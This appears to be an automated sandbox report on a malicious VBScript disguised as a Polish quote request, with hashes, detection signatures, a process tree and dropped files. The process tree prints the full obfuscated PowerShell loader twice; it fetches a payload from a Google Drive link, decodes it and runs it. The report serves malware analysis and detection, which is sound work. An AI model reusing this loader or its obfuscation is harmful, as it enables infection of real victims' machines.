Analysis

  • max time kernel
    148s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-04-2024 04:46

General

  • Target

    Zapytanie ofertowe (7427-23 ROCKFIN).vbs

  • Size

    7KB

  • MD5

    3a6ac16d9bc107b14e4caa9b7ad08756

  • SHA1

    d6c6f6d4843ef83e2c4e3344060aca80b032eb43

  • SHA256

    02b7361eeb75b842d6b7ade09f042879d501e50bc07a8d4edcfc04b7d728b0e7

  • SHA512

    e0003c51e42c3ac764c6114692b1ee155c424e046cd3ba6f3a151bfb58eaccbc347f1cc0e9d3f0c90a6e350047056c38f79926fc716cab84b735533d64dd41ba

  • SSDEEP

    96:+AwU3ey01WrZ9NnWh04lLchxcxaBKXaxcKicGeOuBhsempL92U9xsSwFABSCpu4P:+nWeRsrZXHOgpc3TfsjAQHBUBD

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Zapytanie ofertowe (7427-23 ROCKFIN).vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1356
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Frihandelszonenterweaved = 1;$Adempted='Substrin';$Adempted+='g';Function Omitted($Struts){$Flgerigtigt=$Struts.Length-$Frihandelszonenterweaved;For($Frihandelszone=5; $Frihandelszone -lt $Flgerigtigt; $Frihandelszone+=(6)){$Uopfordredes+=$Struts.$Adempted.Invoke($Frihandelszone, $Frihandelszonenterweaved);}$Uopfordredes;}function Medeas($Brevbakkernes){& ($Kradsende) ($Brevbakkernes);}$Rkereaktionr=Omitted 'ReageM ,ydro F.ebzFlaskiEnvayl Op,alDynapaUforh/Ko,fu5Klebr.,thic0Trygh Prog(InterWNonphipharmn Ar.hdAfmysoO.driwErgomsUdspr Afh,tN LderTRetou outga1U.nke0Paast.Sulf 0Battl;Danse signaWTveb iRkkefn Endo6 Adst4Skalp; Bjni PukixSu mo6Horni4Lyric;.vile skywir M,rsvJon s:J,min1Unapp2,loat1Lango.blget0Aa,de)Vater WillGMiso eApopecVidtskAmme,oArbej/Humir2 .yrt0Gasse1 aren0Skold0Norma1,remi0Goi r1Imagi CeleFHaandiDesinr Udske NeodfTermooKoblex.ompe/Anbr,1Warpa2 alvf1Opsp.. ,iru0bitub ';$Toer=Omitted 'for,sUWolf,sUdflyeTransrIndda- ndeAContegSiperePreflnB initForha ';$Dragboat=Omitted 'St.nohOffpstactintResmopCobitsDeaco:homic/tubbe/Cl,nkdSlimerSekreiA,alov.srumeTegni.DarwigPhr noPartioicemagRets,lFurcaeTapp .Po.occcobleo B,flm ten/Sk.gguflaglcLacew?R.pete.igtbxArbejpFuireoVe.mir,mygdtNonco=Guds.dRevisoAntikwMusicnBo,tilLimb,oC,ntraDomstdSecun&PerikiClaspdMelan=Sensa1,rishMBaromu AktiXArbejp,teff8VagthZPla.ho,tentYRu,yfjPanteBMerceu.econC AutoPPos.r2MaundX Sig.GR,roy8StenlQInarcMreprsYFootsEErhvejDy ena simuTA,sorFSlumpDHolopb wletnPrimoWBisamlToillQ TragRdialy ';$Boltsakse=Omitted 'Manch>Predi ';$Kradsende=Omitted 'Drbybi V,ste.ebrdxSirli ';$Ectognatha='vanddraabernes';Medeas (Omitted 'UnlugSCheckeForsvtBolst-Glo.hCRatiooAabenn Kin,tSheete TrannFolketUdryd Moun -CitriPPancraafflitAnnekhSerpu CatfTK.mmu:Milli\ConfeSEmbryePericmDupliiOver vResunaF.rbrlFeltmvhand aR.ndetP,esseOrdne. NonctTvingx Avart Foss G nza-ProbaVSteataDispel OrthuFjel,eNaade .urmu$FyrfaEMne,ocMinictHyp.roknoldgAmilon.terea Aarst.tdlihRespoaSolbr; Udkr ');Medeas (Omitted 'Photoi.roctfFuldb Staur(Bragut Hyb e UigesFreaktPos,n- KrftpRenskaPolystForlah Tabe AcephTOf ic:,apgr\SyrinSLderseS.atumpassii Sendv mo.naHjulelPle,mvValvuaMaltrtMorepeTykho. SenttsidevxUnblotDenot)Bogbi{Brostepre lxKitt iF.rentJo da} amme;Burel ');$Proviantens = Omitted ' Ru,ke OrdecSam lhStangoT ken Trans% sera SpeepTeaktpStrutd.rykfa bog,tDodsna.euch% Farc\FjernPVir,llSociaaP.ngyiUmrken.avlvb Komma ejlec S.lbk c.ic. indgMErotei.ngensnewfo Ratih&Phyto&Di ss Cruste ImmecFarr hVinduoHelio Bara$ Ch,e ';Medeas (Omitted 'Lirke$ FordgAdvenlsa coocrotab,empeatorqulIngra:Her,cBBefriaF,ppenSneezkTunghbPolemeSki.ssExudatOb.klyMicrorPotpoeKriser.mudsefresknFr lasamorb=Angre(WindscAntiam AmphdGrans fhug/StillcMat,i Plagi$Alt aP DyskrB,itcoRecusvVaporiTelfeaOpsprnEma,ctO,tfleEskimnsnusds Katm) unde ');Medeas (Omitted 'Beska$glasvgKnipllSamaro SphebSpr,gaYeplylTrans: cemGFo.dahSkrdda UmbrnSe,ite,rinosVga,ietrster ,pece resi=Silkn$ aragD Sp,lrintr.aMai pg Tusib Huc.o FlamaSubmotS.irk.SikrisDgninpFamillDataoiSa.dytMoner(Socia$FormuBSkih,oBorghlO gavt Cy.lsSkifta KongkPechisTospaeTurko) Prel ');$Dragboat=$Ghanesere[0];Medeas (Omitted 'Komme$,ipargGranglB.lysoDanseb Dinga MennlSamt :C,ntrM RoadaHovedrMartrrmart o Hydrw,jaseiMarissBekymh Wons=AuxofNChriseLeuciwIzako-BlindOPrivibL.rikjLi,ere Jew cTaks,tmodta Rei,oSsnligyL.cersIdrtstDrejeeMa kgmBrevv.Sil eNe broeNormbtcalc .SpdbaWTaleneRekvibBlac,CJuvell UnmyiSekreeWr ngnUnlivtU der ');Medeas (Omitted 'Uford$sedatM EpilaPrimarNook rSulfooLyvesw ,ardi EntesJtterh.nter.SynonHGieaweUndera AfgudCytobeD ceirOverrsAshke[ Defe$HldenTGarl,oAal ceKunderRangs]Derhj=Creol$PrecoRBomsekNon neStvnerRyk,eeSubdeaV.ksekBenz,tH,mbliTheomoChr,snMeni.rPsitt ');$Scripteres=Omitted 'TebreMTugtea DykkrUnpalr kyggoStilkwRecepiUsurps ChilhTesta.MenosDCountoSk rpwVintrnOoplalDetunoB kkeaDrilldOptrnFKrucii PharlAcrobe.nsla(Canne$ pareDpregrrComb.aSoc,agAdenobDefecoR ndsaHes etOogon,Ac,ep$S.garF Javeo Mar,r FjumpReporo ske,sDiapatJessifAlie.gUndemtInstrnF,rtbiSac,hneksisgStere)Genls ';$Scripteres=$Bankbestyrerens[1]+$Scripteres;$Forpostfgtning=$Bankbestyrerens[0];Medeas (Omitted 'Ekspl$Perchg FladlT,traobrudlbGrnseadeporl gers: BoedDVa.iteUn.ronKremtgmili.uUnsleeLega =Ove,s(OmvltTA,ndleCoxndsXyl ltBaath-s.ungP S otaKonvet ,ookhzoonp Vadef$jeanaFbanjooRefigr ChripBlokao hushsOverptA etrfBadeagSauc.tBlirtnSemidiTils nHidrrgen ol)Shedd ');while (!$Dengue) {Medeas (Omitted ' Dev $nonprg.lgoml,lesvoPeripbMill.aLovp,lPanth:,luotPRaideeFerretForst8salgs7.tabl= Comp$StenetShantrSp,cuuPoodseIngen ') ;Medeas $Scripteres;Medeas (Omitted 'SmugtSUnde,tTeol aGa,ferToneft Arm -UfornS BesklVmin eGrande Ob lp Recy Ex.ra4Disli ');Medeas (Omitted ' Skum$So.utg Trialomlsno Af ab Packako.palRefoc:overfD mtaae eindnSlavegVersiu,elyseRubat=cirku(Stam TPli teAltersDarrftpinyo- StowPUncroaAutistAd.pthAftry Telec$PiertF HeltoKr,str Tel,pA quioGaransTenentMicr f Ko.tgOrga tVask nSimpli Ul.an T.mbg All,) Anti ') ;Medeas (Omitted 'Ingre$ kalpgBrddelCushtoMofusbNoncoaConcil Pind:massaBtryksrRevalyallegnU,washAfleviHighbl uffidBullisGarig= co,v$UlcergUnivelGo,vio He.sbStatiaTradilPolit:Drag.HKorrei Fre,jStal.aSnobbcUnverk skemiNys.antidssgSlmni+Nonci+Cit a%Preno$AnticG KollhKissiaSunbunbrsmge Pas,s MisqeUrethrSaltkeReact.Unde.cMentoo CerouEnhornFidibt dagv ') ;$Dragboat=$Ghanesere[$Brynhilds];}Medeas (Omitted ' Last$ SkivgIncitlHydrooReserbRinglaMeddelCirku: photU H stnEcbalt af ro,idstl.ktteeResenrkandeaPer,otRel,teH,nkedHunte start= Ede, fd elGWorkseRece tBegi -Re.igCHjemmoDisopnOpblstGrippeAmbivn LavttLejeb Inhal$M,ssoFSkinnoPaa.erUnknopProtooSk des,ndertUnderf.yplagSqu.stDesmanBilleiTagvrnBif.og layl ');Medeas (Omitted 'Br,ve$Mar.agForhelS.aseoBloodb Plataemu,gl Inte:ElopeRAnticeJ msecgaloco MudsmChronmMlecheXera.nEvacud Sm.teModulrRumme Hillm=Drkar .udst[ ReseSFa ilyC,ryosDiplotSpadaeTottemNanop.BrombC LubroUnhidnFr,mbvNyctaeKontrrMang tDa,fi]Kvant:Relat:Moru F Wicor Paako Nedbm,izovBHol taIntegsBasuneRu ga6Batto4TetteSFora tChuckrB,foriGerranSat,lg rait( Fakt$AedilUHol sn SteptTeernoStiftl.tilieStjkir P nda Raptt Ji be,ickod Lakr)Rudac ');Medeas (Omitted 'Tilfo$Thin,g F sll Dk.ioFifl,bHimmeaHardsl rap:De,auTApprohFestfeDagt,r suk,mSkorpoBrasedDrosoySvanenTo.lba MimomInspi Aasyn=Linke Alec[FastaSGrindyPau us,rnsjt L,tueamortmManch.FinopT Stude illgx K artMusc,.RecepEPreshnesbjecCoinsoFagi d AsciiDors n For.gOblig] Vl.d:,dbls:UnwivA KrymS Trs.COverlISkifeI Arvi.Anti,GCameleNonprt glumS Ud,atHjemlrFo.eqiNomadnDromegT.adi(I,tra$ BudgRAnt.peMutuac,uyedoHasarmChalcmJussieD.mesnSoupedY urieB enbrNikke)d.ask ');Medeas (Omitted 'Emana$Saltpg.nderl,ksofo V lgbEerieaOssiflSnigv:LemmyDnedskeCilictUnmane RevarEsca,i .inno Hud.rWendiaMuny tWorshi Fig.n Ildhg Cock= Spec$ Dod,T Bo dh T.cieBrugerM.ffvmBl mmoMappid T peyBi ifnArmera Ma,umContr.UndersR minuC.stob Eggws Matet Gu.srSiegeiMi sinbeh ggTidsk(Under3A,ase2Ylaha0P.stm1Slap 1U dst9Non.y,Huswi2F.rvr8U,adu1Marsu6,lbet1Nonco)Slu.s ');Medeas $Deteriorating;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:696
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Plainback.Mis && echo $"
        3⤵
          PID:2196
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Frihandelszonenterweaved = 1;$Adempted='Substrin';$Adempted+='g';Function Omitted($Struts){$Flgerigtigt=$Struts.Length-$Frihandelszonenterweaved;For($Frihandelszone=5; $Frihandelszone -lt $Flgerigtigt; $Frihandelszone+=(6)){$Uopfordredes+=$Struts.$Adempted.Invoke($Frihandelszone, $Frihandelszonenterweaved);}$Uopfordredes;}function Medeas($Brevbakkernes){& ($Kradsende) ($Brevbakkernes);}$Rkereaktionr=Omitted 'ReageM ,ydro F.ebzFlaskiEnvayl Op,alDynapaUforh/Ko,fu5Klebr.,thic0Trygh Prog(InterWNonphipharmn Ar.hdAfmysoO.driwErgomsUdspr Afh,tN LderTRetou outga1U.nke0Paast.Sulf 0Battl;Danse signaWTveb iRkkefn Endo6 Adst4Skalp; Bjni PukixSu mo6Horni4Lyric;.vile skywir M,rsvJon s:J,min1Unapp2,loat1Lango.blget0Aa,de)Vater WillGMiso eApopecVidtskAmme,oArbej/Humir2 .yrt0Gasse1 aren0Skold0Norma1,remi0Goi r1Imagi CeleFHaandiDesinr Udske NeodfTermooKoblex.ompe/Anbr,1Warpa2 alvf1Opsp.. ,iru0bitub ';$Toer=Omitted 'for,sUWolf,sUdflyeTransrIndda- ndeAContegSiperePreflnB initForha ';$Dragboat=Omitted 'St.nohOffpstactintResmopCobitsDeaco:homic/tubbe/Cl,nkdSlimerSekreiA,alov.srumeTegni.DarwigPhr noPartioicemagRets,lFurcaeTapp .Po.occcobleo B,flm ten/Sk.gguflaglcLacew?R.pete.igtbxArbejpFuireoVe.mir,mygdtNonco=Guds.dRevisoAntikwMusicnBo,tilLimb,oC,ntraDomstdSecun&PerikiClaspdMelan=Sensa1,rishMBaromu AktiXArbejp,teff8VagthZPla.ho,tentYRu,yfjPanteBMerceu.econC AutoPPos.r2MaundX Sig.GR,roy8StenlQInarcMreprsYFootsEErhvejDy ena simuTA,sorFSlumpDHolopb wletnPrimoWBisamlToillQ TragRdialy ';$Boltsakse=Omitted 'Manch>Predi ';$Kradsende=Omitted 'Drbybi V,ste.ebrdxSirli ';$Ectognatha='vanddraabernes';Medeas (Omitted 'UnlugSCheckeForsvtBolst-Glo.hCRatiooAabenn Kin,tSheete TrannFolketUdryd Moun -CitriPPancraafflitAnnekhSerpu CatfTK.mmu:Milli\ConfeSEmbryePericmDupliiOver vResunaF.rbrlFeltmvhand aR.ndetP,esseOrdne. NonctTvingx Avart Foss G nza-ProbaVSteataDispel OrthuFjel,eNaade .urmu$FyrfaEMne,ocMinictHyp.roknoldgAmilon.terea Aarst.tdlihRespoaSolbr; Udkr ');Medeas (Omitted 'Photoi.roctfFuldb Staur(Bragut Hyb e UigesFreaktPos,n- KrftpRenskaPolystForlah Tabe AcephTOf ic:,apgr\SyrinSLderseS.atumpassii Sendv mo.naHjulelPle,mvValvuaMaltrtMorepeTykho. SenttsidevxUnblotDenot)Bogbi{Brostepre lxKitt iF.rentJo da} amme;Burel ');$Proviantens = Omitted ' Ru,ke OrdecSam lhStangoT ken Trans% sera SpeepTeaktpStrutd.rykfa bog,tDodsna.euch% Farc\FjernPVir,llSociaaP.ngyiUmrken.avlvb Komma ejlec S.lbk c.ic. indgMErotei.ngensnewfo Ratih&Phyto&Di ss Cruste ImmecFarr hVinduoHelio Bara$ Ch,e ';Medeas (Omitted 'Lirke$ FordgAdvenlsa coocrotab,empeatorqulIngra:Her,cBBefriaF,ppenSneezkTunghbPolemeSki.ssExudatOb.klyMicrorPotpoeKriser.mudsefresknFr lasamorb=Angre(WindscAntiam AmphdGrans fhug/StillcMat,i Plagi$Alt aP DyskrB,itcoRecusvVaporiTelfeaOpsprnEma,ctO,tfleEskimnsnusds Katm) unde ');Medeas (Omitted 'Beska$glasvgKnipllSamaro SphebSpr,gaYeplylTrans: cemGFo.dahSkrdda UmbrnSe,ite,rinosVga,ietrster ,pece resi=Silkn$ aragD Sp,lrintr.aMai pg Tusib Huc.o FlamaSubmotS.irk.SikrisDgninpFamillDataoiSa.dytMoner(Socia$FormuBSkih,oBorghlO gavt Cy.lsSkifta KongkPechisTospaeTurko) Prel ');$Dragboat=$Ghanesere[0];Medeas (Omitted 'Komme$,ipargGranglB.lysoDanseb Dinga MennlSamt :C,ntrM RoadaHovedrMartrrmart o Hydrw,jaseiMarissBekymh Wons=AuxofNChriseLeuciwIzako-BlindOPrivibL.rikjLi,ere Jew cTaks,tmodta Rei,oSsnligyL.cersIdrtstDrejeeMa kgmBrevv.Sil eNe broeNormbtcalc .SpdbaWTaleneRekvibBlac,CJuvell UnmyiSekreeWr ngnUnlivtU der ');Medeas (Omitted 'Uford$sedatM EpilaPrimarNook rSulfooLyvesw ,ardi EntesJtterh.nter.SynonHGieaweUndera AfgudCytobeD ceirOverrsAshke[ Defe$HldenTGarl,oAal ceKunderRangs]Derhj=Creol$PrecoRBomsekNon neStvnerRyk,eeSubdeaV.ksekBenz,tH,mbliTheomoChr,snMeni.rPsitt ');$Scripteres=Omitted 'TebreMTugtea DykkrUnpalr kyggoStilkwRecepiUsurps ChilhTesta.MenosDCountoSk rpwVintrnOoplalDetunoB kkeaDrilldOptrnFKrucii PharlAcrobe.nsla(Canne$ pareDpregrrComb.aSoc,agAdenobDefecoR ndsaHes etOogon,Ac,ep$S.garF Javeo Mar,r FjumpReporo ske,sDiapatJessifAlie.gUndemtInstrnF,rtbiSac,hneksisgStere)Genls ';$Scripteres=$Bankbestyrerens[1]+$Scripteres;$Forpostfgtning=$Bankbestyrerens[0];Medeas (Omitted 'Ekspl$Perchg FladlT,traobrudlbGrnseadeporl gers: BoedDVa.iteUn.ronKremtgmili.uUnsleeLega =Ove,s(OmvltTA,ndleCoxndsXyl ltBaath-s.ungP S otaKonvet ,ookhzoonp Vadef$jeanaFbanjooRefigr ChripBlokao hushsOverptA etrfBadeagSauc.tBlirtnSemidiTils nHidrrgen ol)Shedd ');while (!$Dengue) {Medeas (Omitted ' Dev $nonprg.lgoml,lesvoPeripbMill.aLovp,lPanth:,luotPRaideeFerretForst8salgs7.tabl= Comp$StenetShantrSp,cuuPoodseIngen ') ;Medeas $Scripteres;Medeas (Omitted 'SmugtSUnde,tTeol aGa,ferToneft Arm -UfornS BesklVmin eGrande Ob lp Recy Ex.ra4Disli ');Medeas (Omitted ' Skum$So.utg Trialomlsno Af ab Packako.palRefoc:overfD mtaae eindnSlavegVersiu,elyseRubat=cirku(Stam TPli teAltersDarrftpinyo- StowPUncroaAutistAd.pthAftry Telec$PiertF HeltoKr,str Tel,pA quioGaransTenentMicr f Ko.tgOrga tVask nSimpli Ul.an T.mbg All,) Anti ') ;Medeas (Omitted 'Ingre$ kalpgBrddelCushtoMofusbNoncoaConcil Pind:massaBtryksrRevalyallegnU,washAfleviHighbl uffidBullisGarig= co,v$UlcergUnivelGo,vio He.sbStatiaTradilPolit:Drag.HKorrei Fre,jStal.aSnobbcUnverk skemiNys.antidssgSlmni+Nonci+Cit a%Preno$AnticG KollhKissiaSunbunbrsmge Pas,s MisqeUrethrSaltkeReact.Unde.cMentoo CerouEnhornFidibt dagv ') ;$Dragboat=$Ghanesere[$Brynhilds];}Medeas (Omitted ' Last$ SkivgIncitlHydrooReserbRinglaMeddelCirku: photU H stnEcbalt af ro,idstl.ktteeResenrkandeaPer,otRel,teH,nkedHunte start= Ede, fd elGWorkseRece tBegi -Re.igCHjemmoDisopnOpblstGrippeAmbivn LavttLejeb Inhal$M,ssoFSkinnoPaa.erUnknopProtooSk des,ndertUnderf.yplagSqu.stDesmanBilleiTagvrnBif.og layl ');Medeas (Omitted 'Br,ve$Mar.agForhelS.aseoBloodb Plataemu,gl Inte:ElopeRAnticeJ msecgaloco MudsmChronmMlecheXera.nEvacud Sm.teModulrRumme Hillm=Drkar .udst[ ReseSFa ilyC,ryosDiplotSpadaeTottemNanop.BrombC LubroUnhidnFr,mbvNyctaeKontrrMang tDa,fi]Kvant:Relat:Moru F Wicor Paako Nedbm,izovBHol taIntegsBasuneRu ga6Batto4TetteSFora tChuckrB,foriGerranSat,lg rait( Fakt$AedilUHol sn SteptTeernoStiftl.tilieStjkir P nda Raptt Ji be,ickod Lakr)Rudac ');Medeas (Omitted 'Tilfo$Thin,g F sll Dk.ioFifl,bHimmeaHardsl rap:De,auTApprohFestfeDagt,r suk,mSkorpoBrasedDrosoySvanenTo.lba MimomInspi Aasyn=Linke Alec[FastaSGrindyPau us,rnsjt L,tueamortmManch.FinopT Stude illgx K artMusc,.RecepEPreshnesbjecCoinsoFagi d AsciiDors n For.gOblig] Vl.d:,dbls:UnwivA KrymS Trs.COverlISkifeI Arvi.Anti,GCameleNonprt glumS Ud,atHjemlrFo.eqiNomadnDromegT.adi(I,tra$ BudgRAnt.peMutuac,uyedoHasarmChalcmJussieD.mesnSoupedY urieB enbrNikke)d.ask ');Medeas (Omitted 'Emana$Saltpg.nderl,ksofo V lgbEerieaOssiflSnigv:LemmyDnedskeCilictUnmane RevarEsca,i .inno Hud.rWendiaMuny tWorshi Fig.n Ildhg Cock= Spec$ Dod,T Bo dh T.cieBrugerM.ffvmBl mmoMappid T peyBi ifnArmera Ma,umContr.UndersR minuC.stob Eggws Matet Gu.srSiegeiMi sinbeh ggTidsk(Under3A,ase2Ylaha0P.stm1Slap 1U dst9Non.y,Huswi2F.rvr8U,adu1Marsu6,lbet1Nonco)Slu.s ');Medeas $Deteriorating;"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2052
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Plainback.Mis && echo $"
            4⤵
              PID:3304
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 2576
              4⤵
              • Program crash
              PID:4604
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2052 -ip 2052
        1⤵
          PID:3536

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mm34fpwq.430.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Plainback.Mis
          Filesize

          453KB

          MD5

          79d51e63cdac67160b04f7efab39c849

          SHA1

          d7deadf949f94af3f83b5b03ff941ced567dbb20

          SHA256

          824d31604aec39b84b4d634eef442dc264d46412de3ee2b35befaac615e451c4

          SHA512

          7b5ee831eb58f2c024f06fedc1a20311922d2442b6802c662b02559318ae8dfa510f3d73d2993b169a7edb066a5b353da325eb500c00743842a1bdd5c5770aa2

        • memory/696-0-0x000001DBCF6F0000-0x000001DBCF712000-memory.dmp
          Filesize

          136KB

        • memory/696-10-0x00007FFAB5970000-0x00007FFAB6431000-memory.dmp
          Filesize

          10.8MB

        • memory/696-11-0x000001DBE7EF0000-0x000001DBE7F00000-memory.dmp
          Filesize

          64KB

        • memory/696-12-0x000001DBE7EF0000-0x000001DBE7F00000-memory.dmp
          Filesize

          64KB

        • memory/696-13-0x000001DBE7EF0000-0x000001DBE7F00000-memory.dmp
          Filesize

          64KB

        • memory/696-46-0x00007FFAB5970000-0x00007FFAB6431000-memory.dmp
          Filesize

          10.8MB

        • memory/696-42-0x00007FFAB5970000-0x00007FFAB6431000-memory.dmp
          Filesize

          10.8MB

        • memory/2052-22-0x0000000005520000-0x0000000005586000-memory.dmp
          Filesize

          408KB

        • memory/2052-37-0x0000000007480000-0x000000000749A000-memory.dmp
          Filesize

          104KB

        • memory/2052-21-0x0000000005480000-0x00000000054A2000-memory.dmp
          Filesize

          136KB

        • memory/2052-19-0x0000000002CD0000-0x0000000002CE0000-memory.dmp
          Filesize

          64KB

        • memory/2052-23-0x0000000005C90000-0x0000000005CF6000-memory.dmp
          Filesize

          408KB

        • memory/2052-33-0x0000000005D00000-0x0000000006054000-memory.dmp
          Filesize

          3.3MB

        • memory/2052-34-0x0000000006340000-0x000000000635E000-memory.dmp
          Filesize

          120KB

        • memory/2052-35-0x00000000063F0000-0x000000000643C000-memory.dmp
          Filesize

          304KB

        • memory/2052-36-0x0000000007CE0000-0x000000000835A000-memory.dmp
          Filesize

          6.5MB

        • memory/2052-20-0x0000000005660000-0x0000000005C88000-memory.dmp
          Filesize

          6.2MB

        • memory/2052-38-0x0000000007660000-0x00000000076F6000-memory.dmp
          Filesize

          600KB

        • memory/2052-39-0x0000000007500000-0x0000000007522000-memory.dmp
          Filesize

          136KB

        • memory/2052-40-0x0000000008360000-0x0000000008904000-memory.dmp
          Filesize

          5.6MB

        • memory/2052-18-0x0000000002CD0000-0x0000000002CE0000-memory.dmp
          Filesize

          64KB

        • memory/2052-16-0x0000000002A10000-0x0000000002A46000-memory.dmp
          Filesize

          216KB

        • memory/2052-43-0x0000000074FF0000-0x00000000757A0000-memory.dmp
          Filesize

          7.7MB

        • memory/2052-17-0x0000000074FF0000-0x00000000757A0000-memory.dmp
          Filesize

          7.7MB